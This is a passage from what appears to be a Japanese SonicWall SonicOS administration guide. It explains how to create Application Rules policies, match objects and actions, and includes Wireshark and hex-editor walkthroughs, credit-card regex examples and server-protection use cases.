リケーションの遮断とログ記録のどちらを行うか、どのユーザ、グループ、または IP アドレスを対

象として含めるか除外するか、また執行のスケジュールを定義するグローバルルールを作成しま

す。さらに、以下を定義するアプリケーションルールポリシーも作成できます。

• スキャンするアプリケーションの種類

• 照合する方向、コンテンツ、キーワード、またはパターン

• 照合するユーザまたはドメイン

• 実行する動作

以下のセクションでは、アプリケーションルールのメインコンポーネントについて説明します。

• 帯域幅管理を用いた動作について (173 ページ)

• パケット監視を使用したアクションの関連タスク (179 ページ)

• アプリケーション制御ポリシーの作成について (82 ページ)

• アプリケーションルールポリシーの作成について (36 ページ)

• 一致オブジェクトについて (150 ページ)

• アプリケーションリストオブジェクトについて (161 ページ)

• 動作オブジェクトについて (169 ページ)

• 電子メールアドレスオブジェクトについて (222 ページ)



アプリケーションルールポリシーの作成についてアプリケーションルールを使用すると、ネットワーク上のトラフィックの特定の側面を制御する個別

アプリケーションルールポリシーを作成できます。ポリシーは、一致オブジェクト、プロパティ、お

よび特定の防御動作のセットです。ポリシーを作成するときは、初に一致オブジェクトを作成したうえで、動作を選択 (オプションでカスタマイズ) し、これらをポリシー作成時に参照します。

「ルール > アプリケーションルール」ページで、「アプリケーション制御ポリシーの編集」ダイアロ

グにアクセスできます。ダイアログのオプションは、選択するポリシー種別によって変化します。たとえば、「SMTP クライアント」が選択されている場合、オプションは「アプリケーション制御コン

テンツ」の「ポリシータイプ」とは大きく異なります。

ポリシーの例を次に示します。

• ギャンブルのようなアクティビティに関するアプリケーションを遮断する。

• .exe および .vbs 形式の電子メール添付ファイルを無効にする。

• 送信 HTTP 接続で Mozilla ブラウザを許可しない。

• 発信元が CEO と CFO の場合を除き、 "SonicWall Confidential (SonicWall 社外秘)" というキー

ワードを含む、送信電子メールまたは MS Word 添付ファイルを許可しない。

• すべての機密文書内でグラフィックまたは透かしが検出された送信電子メールを許可しない。



ポリシーを作成するときは、ポリシー種別を選択します。それぞれのポリシー種別は、ポリシーの送信元、送信先、一致オブジェクト種別、および動作フィールドに有効な値または値タイプを指定します。さらに、ポリシーを定義することで、特定のユーザまたはグループを対象として含めるかまたは除外するかの指定、スケジュールの選択、ログ記録の有効化、接続側の指定、および基本または詳細方向タイプの指定を行うこともできます。基本方向タイプは、受信または送信のみを単に示します。詳細方向タイプでは、ゾーン間の送信の方向 (例えば LAN から WAN) を設定できます。

アプリケーションルール: ポリシー種別テーブルに、使用可能なアプリケーションポリシー種別の特

徴を示します。

アプリケーションルール: ポリシー種別

ポリシー種別

説明

有効な送信元サービス/既定

有効な送信先サービス/既定

有効な一致オブジェクト種別

有効な動作種別接続側

アプリケーション制御コンテンツ

任意のアプリケーション層プロトコルの動的なアプリケーションルール関連オブジェクトを使用するポリシー

すべて/すべて

すべて/すべて

アプリケーション種別リスト、アプリケーションリスト、アプリケーションシグネチャリス

ト

リセット /破棄動作なし DPI を迂回するパケット監視、帯域幅管理グローバル -* WAN 帯域幅管

理 *

N/A

個別ポリシー

任意のアプリケーション層プロトコルの個別オブジェクトを使用するポリシー、IPS 形式の個

別のシグネチャを作成するのに使用可

すべて/すべて

すべて/すべて

個別オブジェクト

リセット /破棄 DPI を迂回するパケット監視動作なし、帯域幅管理グローバル -* WAN 帯域幅管

理 *

クライアント側、サーバ側、両方

FTP クライ

アント FTP 制御チャ

ンネルで転送されるすべての FTPコマンド

すべて/すべて

FTP 制御/FTP 制御

FTP コマン

ド、 FTP コマ

ンド+値、個別

オブジェクト

リセット /破棄 DPI を迂回するパケット監視動作なし

クライアント側

FTP クライ

アントファイルアップロード要求

FTP でファイ

ルをアップロードしようとする試み (STOR コマン

ド )

すべて/すべて


ファイル名、ファイル拡張子


理 *




FTP クライ

アントファイルダウンロード要求

FTP でファイ

ルをダウンロードしようとする試み (RETR コマン

ド )

すべて/すべて


ファイル名、ファイル拡張子


理 *


FTP データ

転送ポリシー

FTP データチャンネルで転送されるデータ

すべて/すべて

すべて/すべて

ファイル内容オブジェクト


両方

HTTP クラ

イアント

ウェブブラ

ウザトラ

フィックまたはクライアント上で発生するすべての HTTP 要求に

適用されるポリシー

すべて/すべて

すべて/HTTP (設定可能)

HTTP ホス

ト、 HTTP Cookie、 HTTP リファラ、HTTP Request 個別ヘッダー、 HTTP URI コンテン

ツ、 HTTP ユーザエー

ジェント、ウェブブラウ

ザ、ファイル名、ファイル拡張子個別オブジェクト

リセット /破棄 DPI を迂回するパケット監視1 動作なし、帯域幅管理グローバル -* WAN 帯域幅管

理 *


HTTP サーバ

HTTP サーバ

から発信される応答

すべて/HTTP (設定可能)

すべて/すべて

ActiveX クラス ID、 HTTP Set Cookie、 HTTP Response、ファイル内容オブジェクト、個別ヘッダー、個別オブジェクト

リセット /破棄 DPI を迂回するパケット監視動作なし帯域幅管理グローバル -* WAN 帯域幅管

理 *

サーバ側

IPS コンテ

ンツ

任意のアプリケーション層プロトコルの動的な侵入防御関連オブジェクトを使用するポリシー

N/A N/A IPS シグネチャ

種別リスト、IPS シグネ

チャリスト


理 *

N/A


ポリシー種別

説明







アプリケーションルールとアプリケーション制御のライセンスアプリケーションの視覚化および制御には、次の 2 つのコンポーネントがあります。

• 可視化コンポーネントは、「装置の健全性」ページの「監視」ビューのアプリケーショントラ

フィックの識別とレポートを提供します。

POP3 クラ

イアント

POP3 クライ

アントによって生成されたトラフィックを検査するポリシー、通常は POP3 サー

バ管理者にとって有用

すべて/すべて

POP3 (電子

メールの取得)/POP3 (電子メールの取得)

個別オブジェクト



POP3サーバ

POP3 サーバ

からPOP3 クライアントにダウンロードされた電子メールを検査するポリシー、電子メールフィ

ルタに使用

POP3 (電子メールの取得)/POP3 (電子メールの取得)

すべて/すべて

電子メール本文、電子メール CC、電子

メール送信元、電子メール送信先、電子メール件名、ファイル拡張子、MIME 個別

ヘッダー

リセット /破棄電子メール添付ファイルを無効化 - テキストの

追加 DPI を迂回

する動作なし

サーバ側

SMTP クラ

イアント

クライアント上で発生するSMTP トラ

フィックに適用されるポリシー

すべて/すべて

SMTP (電子

メールの送信)/SMTP (電子メールの送信)

電子メール本文、電子メール CC、電子

メール送信元、電子メール送信先、電子メールサイ

ズ、電子メール件名、個別オブジェクト、ファイル内容、ファイル名、ファイル拡張子、MIME 個別

ヘッダー

リセット /破棄応答を返さずに SMTP 電子メー

ルを遮断 DPI を迂回するパケット監視動作なし


1. パケット監視動作は、ファイル名またはファイル拡張子個別オブジェクトに対してサポートされていません。


ポリシー種別

説明







• 制御コンポーネントは、アプリケーション制御としてライセンスされ、ネットワークで処理されるアプリケーショントラフィックのログ記録、遮断、帯域幅管理を行うための個別のアプリケー

ション制御ポリシーとアプリケーションルールポリシーの作成および執行を可能にします。

また、アプリケーション可視化とアプリケーション制御は、 SonicWall ゲートウェイアンチウイルス

(GAV)、アンチスパイウェア、侵入防御サービス (IPS) を含むその他のセキュリティサービスと合わせ

たバンドル形式でライセンスされます。

30 日間無料トライアルは、バンドルされている他のサービスでも使用できますが、アプリケーショ

ン可視化やアプリケーション制御の場合のように自動的に有効になることはありません。追加の無料トライアルは、 SonicOS の個別のセキュリティサービスページまたは MySonicWall で開始できます。

アプリケーション制御の使用を開始するには、この機能を「ルール > アプリケーション制御」ページ

の「アプリケーション制御のグローバル設定」セクションで有効にする必要があります。

「アプリケーションルール」と「アプリケーション制御」で作成したポリシーを使用するには、

「ルール > アプリケーション制御」ページで「アプリケーション制御を有効にする」を選択します。

30 日間トライアルを開始する (登録時) か、セキュリティサービスライセンスバンドルを購入する

と、 SonicWall ライセンスサーバによってアプリケーション可視化とアプリケーション制御のライセ

ンスキーがファイアウォールに提供されます。

ライセンスは、 www.mysonicwall.com の「ゲートウェイサービス」の下にある「サービス管理」ペー

ジで入手できます。

セキュリティサービスライセンスバンドルには、次の購読サービスのライセンスが含まれます。

• アプリケーション可視化

• アプリケーション制御

• ゲートウェイアンチウイルス

• ゲートウェイアンチスパイウェア

• 侵入防御サービス

アプリケーションシグネチャの更新と他のセキュリティサービスのシグネチャの更新は、これらの

サービスのライセンスされている限り、定期的にファイアウォールにダウンロードされます。

2 つのファイアウォール間で高可用性が設定されていると、それらの装置はセキュリティサービスライセンスを共有できます。この機能を使用するには、 MySonicWall でファイアウォールを関連付けら

メモ： MySonicWall での登録時や、登録済み SonicWall 機器への SonicOS のロード時には、サポー

トされている SonicWall 装置でアプリケーション可視化とアプリケーション制御の 30 日間トラ

イアルライセンスが自動的に開始され、アプリケーションシグネチャが装置にダウンロードさ

れます。

メモ： SonicOS 管理インターフェースでアプリケーション制御を無効にしている場合は、その機

能を再び有効にするまでアプリケーションシグネチャの更新が中断されます。



http://www.mysonicwall.com

れた製品として登録する必要があります。どちらの装置も同じ SonicWall ネットワークセキュリティ

装置モデルでなければなりません。

用語アプリケーション層: 7 層 OSI モデルの 7 番目のレベル。 AIM、 DNS、 FTP、 HTTP、 IMAP、 MSN Messenger、POP3、 SMTP、 SNMP、 Telnet、および Yahoo Messenger はアプリケーション層プロトコルの例です。

帯域幅管理: ネットワークの渋滞およびネットワークのパフォーマンス劣化を回避するために、ネッ

トワークリンク上のトラフィックを計測して制御する処理です。

クライアント : 通常、クライアント /サーバ手法におけるクライアントは、パーソナルコンピュータまた

はワークステーション上で実行され、サーバを利用して一部の処理を実行するアプリケーションです。

デジタル権利管理: デジタルデータへのアクセスとその利用を制御するために出版社や著作権保有者

によって使用される技術。

FTP: ファイル転送プロトコル。インターネット上でファイルを交換するためのプロトコル。

ゲートウェイ : ネットワークへの入り口として動作するコンピュータ。ファイアウォールやプロキシ

サーバとして使用されることもよくあります。

きめ細かい制御: システムの個別のコンポーネントを制御できること。

16 進: 基数を 16 とする記数法。

HTTP: Hyper Text Transfer Protocol。 World Wide Web によって使用される基底のプロトコル。

HTTP リダイレクト : 1 つのウェブページを多くの URL で利用できるようにするウェブ上の手法。 URLリダイレクトとも呼ばれます。

IPS: 侵入防御サービス

MIME: Multipurpose Internet Mail Extensions。グラフィック、オーディオ、ビデオなどの非 ASCII メッ

セージをインターネット上で転送できるように形式化するための仕様。

POP3: Post Office Protocol。メールサーバから電子メールを取得するために使用されるプロトコル。

SMTP と一緒に使用することもできます。

プロキシ: クライアントが他のネットワークサービスに間接的にネットワーク接続できるようにする

ネットワークサービスを実行するコンピュータ。

SMTP: Simple Mail Transfer Protocol。サーバ間で電子メールメッセージを送信するために使用されるプ

ロトコル。

UDP: User Datagram Protocol。 IP ネットワーク上で実行されるコネクションレスプロトコル。

重要：高可用性ペアでは、 MySonicWall で初めて装置を登録する場合も、プライマリ装置とセカ

ンダリ装置の双方を SonicOS 管理インターフェースから個別に登録して、各装置のそれぞれの管

理 IP アドレスにログインする必要があります。これにより、セカンダリ装置はファイアウォー

ルライセンスサーバと同期され、関連付けられているプライマリ装置とライセンスを共有でき

るようになります。インターネットへのアクセスが制限されている場合は、共有するライセンスを手動で両方の装置に適用できます。



ルール > アプリケーションルール

アプリケーションルールポリシーを使用するには、その前にアプリケーション制御を有効にする必

要がありますが、その機能を有効にしないでポリシーを作成することはできます。アプリケーション制御はグローバル設定で有効になっており、制御する各ネットワークゾーンで有効にする必要があ

ります。

アプリケーション制御ポリシーを設定するには、アプリケーションルールウィザードを使用する

か、「ルール> アプリケーションルール」ページを手動で設定します。ウィザードを使用すると、安

全に設定を行うことができ、ネットワークトラフィックを不必要に遮断するようなエラーを防ぐこ

とができます。手動による設定では、個別の動作またはポリシーが必要な状況により柔軟に対応できます。

アプリケーションルールポリシーには、一致オブジェクト (またはアプリケーションリストオブ

ジェクト ) とアクションオブジェクトが必要です。「オブジェクト > 一致ブジェクト」ページで一致

オブジェクトを設定できます。また、「オブジェクト > 一致オブジェクト」ページでアプリケーショ

ンリストオブジェクトを設定します。アプリケーションリストオブジェクトを作成するときは、

「ルール > アプリケーション制御」ページに表示されているのと同じアプリケーションカテゴリ、シ

グネチャ、または特定のアプリケーションから選択します。動作オブジェクトは、「オブジェクト >動作オブジェクト」ページで作成されます。

これと比較して、「ルール > アプリケーション制御」ページでアプリケーション制御のグローバルブロックまたはログ設定を構成できます。一致オブジェクトまたは動作オブジェクトは必要ありません。

アプリケーションルールポリシーとそれに使用されるオブジェクトの設定については、次のトピッ

クを参照してください。

• アプリケーションルールポリシーの設定 (42 ページ)

• アプリケーションルールウィザードを使用する (45 ページ)

• オブジェクト > 一致オブジェクト (150 ページ)

• オブジェクト > 動作オブジェクト (168 ページ)

• オブジェクト > 電子メールアドレスオブジェクト (222 ページ)

• アプリケーションルール設定の確認 (45 ページ)

• アプリケーションルールの使用例 (51 ページ)

アプリケーションルールポリシーの設定必要な一致オブジェクトと動作オブジェクトを作成すると、これらのオブジェクトを使用するポリシーを作成できるようになります。

アプリケーション制御ウィザードを使ったポリシーの作成については、アプリケーションルール

ウィザードを使用する (45 ページ) を参照してください。



ポリシーおよびポリシー種別の詳細については、アプリケーションルールポリシーの作成について

(36 ページ) を参照してください。

アプリケーションルールポリシーを設定するには:

1 管理ビューで、「ポリシー | ルール > アプリケーションルール」ページを開きます。

2 ページの上部にある「追加」を選択します。「アプリケーション制御ポリシーの編集」ダイア

ログが表示されます。

3 「ポリシー名」フィールドに、わかりやすい名前を入力します。

4 ドロップダウンメニューから「ポリシー種別」を選択します。ここでの選択によって、ダイア

ログに表示されるオプションが変わります。使用できるポリシー種別の詳細については、アプリケーションルールポリシーの作成について (36 ページ) を参照してください。

5 「アドレス」ドロップダウンメニューから送信元および送信先のアドレスグループまたはアド

レスオブジェクトを選択します。「IPS コンテンツ」、「アプリケーション制御コンテンツ」、

または「CFS」のポリシー種別では、単一の「アドレス」フィールドのみを使用できます。

メモ：「ルール > アプリケーション制御」ページで設定されたポリシーは、「ルール > アプリ

ケーションルール」ページで設定されたポリシーよりも優先されます。



6 「サービス」ドロップダウンメニューから送信元または送信先サービスを選択します。ポリシー

種別によってはサービスを選択できない場合があります。

7 「除外アドレス」で、ドロップダウンメニューからアドレスグループまたはアドレスオブジェ

クトを必要に応じて選択します。このアドレスは、ポリシーの影響を受けません。

8 「一致オブジェクト」で、ポリシー種別に当てはまる定義済みの一致オブジェクトを含むドロップダウンメニューから一致オブジェクトを選択します。「ポリシー種別」が「HTTP クラ

イアント」の場合、必要に応じて除外一致オブジェクトを選択できます。

除外一致オブジェクトを使用すると、ポリシーのサブドメインを区別できます。例えば、news.yahoo.com は許可するが、その他すべての yahoo.com サイトは遮断したい場合は、

yahoo.com と news.yahoo.com の両方に対して一致オブジェクトを作成します。さらに、

「一致オブジェクト」 yahoo.com を遮断するポリシーを作成し、「一致オブジェクトを除

外」を news.yahoo.com に設定します。

9 「動作オブジェクト」で、ポリシー種別に当てはまる動作を含むドロップダウンメニューから動

作を選択します。使用可能なオブジェクトには、定義済みのアクションと、適用可能なユーザ定義のアクションが含まれます。既定値は、いずれのポリシー種別も「リセット /破棄」です。

10 「ユーザ/グループ」で、「包含」と「除外」の両方についてドロップダウンメニューから選択

を行います。「除外」で選択されたユーザまたはグループは、ポリシーの影響を受けません。

11 ポリシー種別が「SMTP クライアント」の場合は、「包含」と「除外」の両方について「メール

送信者」と「メール受信者」のドロップダウンメニューから選択を行います。「除外」で選択

されたユーザまたはグループは、ポリシーの影響を受けません。

12 「スケジュール」で、ポリシーを有効にするさまざまなスケジュールを含むドロップダウンメニューから選択を行います。

既定である「常に有効」以外のスケジュールを指定すると、スケジュールで設定された時間帯にのみルールが有効になります。例えば、業務に関係のないサイトへのアクセスを遮断するポリシーに対して「勤務時間」を指定すると、業務時間外にそうしたサイトへのアクセスを許可することができます。

13 一致が見つかったときにログエントリを作成するポリシーにする場合は、「ログを有効にする」

チェックボックスをオンにします。

14 ログに詳細な情報を記録するには、「個々のオブジェクトコンテンツのログ」チェックボック

スをオンにします。

15 ポリシー種別が「IPS コンテンツ」の場合は、「IPS メッセージ形式を使用したログ」チェック

ボックスをオンにします。これで、ログエントリ内の種別は "アプリケーション制御" ではな

く "侵入防御" と表示され、ログメッセージ内では "アプリケーション制御の警告" ではなく

"IPS 検出警告" のような接頭辞が使われるようになります。これは、ログフィルタを使用して

IPS に関する警告を検索する場合に便利です。

16 ポリシー種別が「アプリケーション制御コンテンツ」の場合は、ログエントリ内の種別を "アプリケーション制御" と表示し、ログメッセージ内で "アプリケーション制御検出警告" のよう

な接頭辞を使用するために、「アプリケーション制御メッセージ形式でログする」チェックボックスをオンにします。これは、ログフィルタを使用してアプリケーション制御に関する警

告を検索する場合に便利です。

メモ：一致オブジェクト種別が「個別オブジェクト」に設定されている場合、「除外一致オブジェクト」は有効になりません。個別オブジェクトは除外一致オブジェクトとして選択できません。

ヒント：ログのみのポリシーの場合は、「動作なし」を選択します。



17 「ログ冗長フィルタ」で、「グローバル設定を使用」を選択して「ルール > アプリケーション

制御」ページで設定されたグローバル値を使用するか、このポリシーの各ログエントリ間の遅延を秒数で入力します。グローバル設定よりも優先されるローカル設定の対象となるのはこのポリシーのみです。他のポリシーは影響を受けません。

18 「接続側」で、ドロップダウンメニューから目的の接続側を選択します。利用できる選択肢は

ポリシー種別に依存し、含まれる可能性があるのは「クライアント側」、「サーバ側」、または「両方」であり、これらはトラフィックがどちら側で発生したかを表します。ポリシー種別が「IPS コンテンツ」または「アプリケーション制御コンテンツ」の場合、この設定オプショ

ンはありません。

19 「方向」で、「基本」または「詳細」のどちらかを選択し、ドロップダウンメニューから方向

を選択します。「基本」の場合は、「受信」、「送信」、または「両方」を選択できます。「詳細」の場合は、ゾーン間の方向 (例えば LAN から WAN) を選択できます。ポリシー種別が

「IPS コンテンツ」または「アプリケーション制御コンテンツ」の場合、この設定オプション

はありません。

20 ポリシー種別が「IPS コンテンツ」または「アプリケーション制御コンテンツ」の場合は、「ゾー

ン」ドロップダウンメニューからゾーンを選択します。ポリシーはこのゾーンに適用されます。


アプリケーションルールウィザードを使用するアプリケーションルールウィザードを使用すると、多くの一般的な使用事例に対する安全な設定を

行うことができます。ただし、すべての状況に対応できるわけではありません。ウィザードを使用していて必要なオプションが見つからない場合は、いつでも「キャンセル」を選択し、手動による設定に切り替えることができます。手動による設定では、一致オブジェクト、動作、電子メールユーザ

オブジェクト (必要な場合)、およびこれらを参照するポリシーなど、すべてのコンポーネントを設定

する必要があります。情報の参照先:

• アプリケーションルールガイド (ウィザード ) については、『SonicOS クイック設定』技術ドキュ

メントの「アプリケーションルールガイド (ウィザード ) の使用」を参照してください。

• 手動でのポリシー作成手順については、アプリケーションルールポリシーの設定 (42 ページ) を参照してください。

アプリケーションルール設定の確認ポリシー設定を確認するには、ポリシーに一致するトラフィックを送信します。 Wireshark™ などの

ネットワークプロトコルアナライザを使用すると、パケットを表示できます。 Wireshark の使用法に

ついては、 Wireshark (46 ページ) を参照してください。

包含されるユーザとグループおよび除外されるユーザとグループの両方についてテストしてください。さらに、設定したスケジュールに従ってテストを実行して、ポリシーが意図されたとおりに動作することを確認します。 SonicOS 管理インターフェースの「調査」ビューのイベントログページでロ

グのログエントリを確認します。

「ルール > アプリケーションルール」ページで各ポリシーをマウスでポイントすると、ツールチッ

プを表示できます。ツールチップには、そのポリシーの一致オブジェクトと動作の詳細が表示され

ます。また、ページ下部には、定義されたルールの数が表示されます。



便利なツールこのセクションでは、アプリケーションルールを大限に利用するための 2 つのソフトウェアツー

ルについて説明します。次のツールについて説明します。

• Wireshark (46 ページ)

• 16 進エディタ (48 ページ)

WiresharkWireshark は、アプリケーションからネットワーク上に送出されるパケットを監視するネットワーク

プロトコルアナライザです。パケットをチェックすることで、アプリケーションの一意な識別子を

調べることができます。この情報を基に、アプリケーションルールポリシーで使用する一致オブ

ジェクトを作成します。

Wireshark は、以下のサイトから無料で入手できます。 http://www.wireshark.org

次に示すパケット監視手順で、ウェブブラウザの一意な識別子またはシグネチャを調べる手順を示

します。

1 Wireshark で、「Capture > Interfaces」を選択して、ローカルネットワークインターフェースを

表示します。

2 「Capture Interfaces」ダイアログボックスで、「Capture」を選択してメインネットワークインターフェース上でのキャプチャを開始します。



http://www.wireshark.org

キャプチャを開始したらブラウザを起動し、その後、キャプチャを停止します。この例では、Firefox を起動しています。

3 上部ペインのキャプチャされた出力の中で HTTP GET コマンドを見つけて選択して、そのソース

を中央ペインに表示します。ソースコード内で、 User-Agent で始まる行を見つけます。

4 右側にスクロールしてブラウザの一意な識別子を調べます。この例では、 Firefox/1.5.0.7 です。

5 「一致オブジェクトの設定」ウィンドウの「内容」テキストフィールドに識別子を入力します。



6 「OK」を選択して、ポリシーで使用可能な一致オブジェクトを作成します。

16 進エディタ

16 進エディタを使用すると、ファイルまたはグラフィックイメージを 16 進形式で表示できます。 16進エディタの 1 つに、 Christian Maas 氏によって開発された XVI32 があります。この 16 進エディタ

は、次の URL から無料で入手できます。

http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm

例えば、機密扱いの社内向け文書のすべてに特定のグラフィックが含まれている場合は、 16 進エ

ディタを使用してグラフィックに固有の識別子を取得し、その固有の 16 進文字列を使用して一致オ

ブジェクトを作成します。ポリシー内でこの一致オブジェクトを参照することで、このグラフィックにコンテンツが一致するファイルの転送を遮断できます。

SonicWall のグラフィックを例に使用してグラフィックの一致オブジェクトを作成するには:



http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm

1 XVI32 を起動し、「File > Open」を選択してグラフィックイメージ GIF ファイルを開きます。

2 左ペインで、「Edit > Block <n> chars…」を選択します。次に、「decimal」オプションを選択し、

表示されるスペースに「50」と入力して、初の 50 個の 16 進文字ブロックをマークします。

これにより、ファイルの初の 50 文字がマークされます。個別一致オブジェクトで使用する

一意の拇印を生成するには、これで十分です。

または、次の手順に従ってブロックをマークします。

• 初の文字 (#0) を選択します。

• Ctrl+B を押します。

• 位置 #49 の文字を選択します。

• Ctrl+B を押します。

位置#49 の文字を見つけるには、右ペイン (テキストペイン) 内の文字を選択し、左下隅に表示

される情報から 10 進アドレスを確認します。選択する文字を変えながら、「Adr. dec: 49」。

ブロックをマークすると、フォントの色が赤に変わります。文字ブロックのマークを解除するには、 Ctrl+U を押します。

メモ： Ctrl+B キーを押してブロックをマークする前に、左ペインの対応する位置を選択す

る必要があります。



3 ブロックをマークしたら、「Edit > Clipboard > Copy As Hex String」を選択します。

4 マルチ機能のテキストエディタで、「Ctrl+V」を押して選択内容を貼り付け、 Enter を押して行

を改行します。

この中間の手順は、 16 進文字列からスペースを削除するために必要です。

5 テキストエディタで、「検索 > 置換」を選択して「置換」ダイアログボックスを表示します。

「Replace」ダイアログボックスで、「Find」テキストボックスにスペースを入力し、

「Replace」テキストボックスは空白のままにしておきます。「Replace All」を選択します。

これで、文字間にスペースを含まない 50 個の 16 進文字から構成される 16 進文字列が得られ

ます。

6 16 進文字列をダブルクリックして選択し、 Ctrl+C を押してクリップボードにコピーします。

7 SonicOS ユーザインターフェースで、「オブジェクト > 一致オブジェクト」を選択し、「一致オ

ブジェクトの作成」を選択します。

8 「一致オブジェクトの設定」ダイアログで、わかりやすいオブジェクト名を「オブジェクト名」フィールドに入力します。

9 「一致オブジェクト種別」ドロップダウンメニューで、「個別オブジェクト」を選択します。

10 「入力形式」で、「16 進数」を選択します。

11 「内容」フィールドで、 Ctrl+V キーを押してクリップボードの内容を貼り付けます。





これで、イメージの一意な識別子を含んだ一致オブジェクトが作成されました。次は、この一致オブジェクトと一致するイメージを含むトラフィックを遮断したりログに記録したりするアプリケーションルールポリシーを作成します。ポリシーの作成については、アプリケーショ

ンルールポリシーの設定 (42 ページ) を参照してください。

アプリケーションルールの使用例アプリケーションルールは、いくつかのタイプのアクセス制御を効率的に処理する機能を提供しま

す。このセクションでは、以下の使用事例を紹介します。

• 一致オブジェクトでの正規表現の作成 (52 ページ)

• ポリシーベースのアプリケーションルール (53 ページ)

• アプリケーションシグネチャベースポリシーのログ (54 ページ)

• コンプライアンスの施行 (55 ページ)

• サーバの保護 (55 ページ)

• ホストされる電子メール環境 (55 ページ)

• 電子メール制御 (56 ページ)

• ウェブブラウザ制御 (57 ページ)

• HTTP POST 制御 (58 ページ)

• 禁止するファイルタイプ制御 (60 ページ)

• ActiveX コントロール (62 ページ)



• FTP 制御 (64 ページ)

• 帯域幅管理 (70 ページ)

• DPI を迂回する (70 ページ)

• 個別のシグネチャ (72 ページ)

• リバースシェル悪用の防御 (75 ページ)

一致オブジェクトでの正規表現の作成定義済みの正規表現を設定時に選択できます。また、個別正規表現を設定することもできます。この使用事例では、クレジットカード番号の Regex 一致オブジェクトの作成方法を説明しつつ、いくつか

の一般的なエラーについても示します。

例えば、次の非効率的で少し間違った構文を使用して、クレジットカード番号に対する Regex 一致オ

ブジェクトを作成するとします。

[1-9][0-9]{3} ?[0-9]{4} ?[0-9]{4} ?[0-9]{4}

ユーザはこのオブジェクトを使用してポリシーを作成しようとします。ユーザが [OK] をクリックす

ると、 SonicWall セキュリティ装置には "お待ちください…" というメッセージが表示されますが、管理

セッションが非常に長時間無反応になり、結果的に正規表現が拒否されることがあります。

このような動作の原因は、個別オブジェクトとファイル内容一致オブジェクトでは、正規表現の前に暗黙的にドットとアスタリスク (.*) が付くことです。ドットは、 '\n' を除く 256 文字の ASCII 文字す

べてと一致します。このことや、使用されている一致オブジェクト種別や、正規表現の性質が相まって、制御プレーンが必要なデータ構造をコンパイルするのに長い時間がかかります。

解決策は、正規表現の前に '\D' を付けることです。これは、クレジットカード番号の前に数字以外の

文字が付き、実際に正規表現がより正確になるということを意味します。

さらに、上記の正規表現は、対象のクレジットカード番号を必ずしも正確に表していません。現在の形の正規表現では、 1234 12341234 1234 など、いくつかの誤検出に一致する可能性があります。

より正確な表現は以下のようになります。

\D[1-9][0-9]{3} [0-9]{4} [0-9]{4} [0-9]{4}

または

\D[1-9][0-9]{3}[0-9]{4}[0-9]{4}[0-9]{4}

より簡潔な表現は、それぞれ

\D\z\d{3}( \d{4}){3}

または

\D\z\d{3}(\d{4}){3}

となります。

これらは、 1 つの一致オブジェクトの中に 2 つの正規表現として記述することも、以下のように 1 つの正規表現に圧縮することもできます。

\D\z\d{3}(( \d{4}){3}|(\d{12}))

次の正規表現を使用して、数字を '-' で区切ってクレジットカード番号をキャプチャすることもでき

ます。

\D\z\d{3}(( \d{4}){3}|(-\d{4}){3}|(\d{12}))

先行する '\D' は、これらすべての正規表現に含める必要があります。



ポリシーベースのアプリケーションルールSonicWall のアプリケーションシグネチャデータベースはアプリケーション制御機能の一部であり、

ポリシー設定とそれらに関連する動作に対するきめ細かな制御を可能にします。これらのシグネチャ

データベースは、アプリケーションの脆弱性だけでなくワーム、トロイの木馬、ピアツーピア転送、スパイウェア、裏口侵入企図からもユーザを保護するために使用されます。また、 SonicWall の再組

み立て不要の精密パケット検査エンジンで使用されている広範なシグネチャ言語により、アプリケーションおよびプロトコルで新たに見つかった脆弱性に対する事前対処的な防御を実現します。

アプリケーションルールポリシーを作成するには、まずアプリケーションリストタイプの一致オブ


アプリケーションを対象とした一致オブジェクトの例に、 LimeWire および Kazaa のピアツーピア共有

アプリケーションを対象とした一致オブジェクトの例を示します。

アプリケーションを対象とした一致オブジェクトの例

アプリケーションベースの一致オブジェクトを作成したら、この一致オブジェクトを使用するアプ

リケーション制御コンテンツタイプの新しいアプリケーションルールポリシーを作成します。一致

オブジェクトを使用するアプリケーション制御ポリシーの例に示すアプリケーション制御ポリシーは、先ほど作成したばかりの “Napster/LimeWire P2P" 一致オブジェクトを使用して、すべての Napsterおよび LimeWire トラフィックを破棄するものです。



一致オブジェクトを使用するアプリケーション制御ポリシーの例

アプリケーションシグネチャベースポリシーの

ログ他の一致オブジェクトポリシーのタイプと同様、アプリケーションコンテンツポリシーでもログを

有効にできます。既定では、これらのログが標準形式で表示されます。ここでは、警告/動作を開始

したアプリケーションルールポリシーが表示されています。標準ログを参照してください。ログイベントに関する詳細を参照するには、そのポリシーに対する「アプリケーション制御ポリシーの編集」ダイアログの「アプリケーション制御メッセージ形式でログする」チェックボックスをオンにします。アプリケーション制御形式のログを参照してください。

標準ログ

アプリケーション制御形式のログ



コンプライアンスの施行多くの企業や組織では、送信ファイル転送に関するポリシーを確実に順守することが求められています。アプリケーションルールは、 HTTP、 FTP、 POP3、および SMTP の各コンテキストにおいてこの機

能を提供します。これにより、企業は、 HIPAA、 SOX、および PCI などの規制要件を満たすことができ

ます。

この目的のポリシーを設定する場合、「方向 > 基本 > 送信」を選択して、明確にファイル転送制限を

送信トラフィックに適用できます。また、「方向 > 詳細設定」を選択し、ファイル転送を防止する

ゾーンを指定することもできます。例えば、 LAN から WAN や LAN から DMZ などのゾーンのほか、自

分で定義したゾーンを指定できます。

サーバの保護通常、サーバは、多くの信頼されないクライアントからアクセスされます。これらの貴重なリソースの善の保護手段として、複数の防御線を設置する必要があります。ゲートウェイにアプリケーションルールを導入することで、サーバを保護するためのポリシーを設定できます。例えば、すべての

put FTPコマンドを遮断するポリシーを作成して、ユーザがサーバにファイルを書き込むことを禁止で

きます (FTP コマンドの遮断 (68 ページ) を参照してください)。サーバ自体が読み取り専用と設定され

ている場合であっても、このような対策を施すことで、ファイアウォール管理者によって制御されるセキュリティが追加されます。ミス、パッチの副作用、または悪意のある何者かによって設定が変更された場合でも、サーバは保護されます。アプリケーションルールを使用すると、 HTTP、 SMTP、POP3、および FTP を使用したサーバへのコンテンツのアップロードを効果的に制御できます。

サーバに影響を与えるポリシーの例として、ラックに設置されたサーバを使用して 3 つのレベルの

サービスを顧客に提供する小規模の ISP があります。ゴールドレベルでは、顧客はウェブサーバ、電

子メールサーバ、および FTP サーバをホストできます。シルバーレベルでは、顧客はウェブサーバ

と電子メールサーバをホストできます。ブロンズレベルのホスティングパッケージでは、ウェブ

サーバのみが許可されます。この ISP は、アプリケーションルールを使用してそれぞれの顧客に対し

てポリシーを作成することで、このような制限を実現できます。

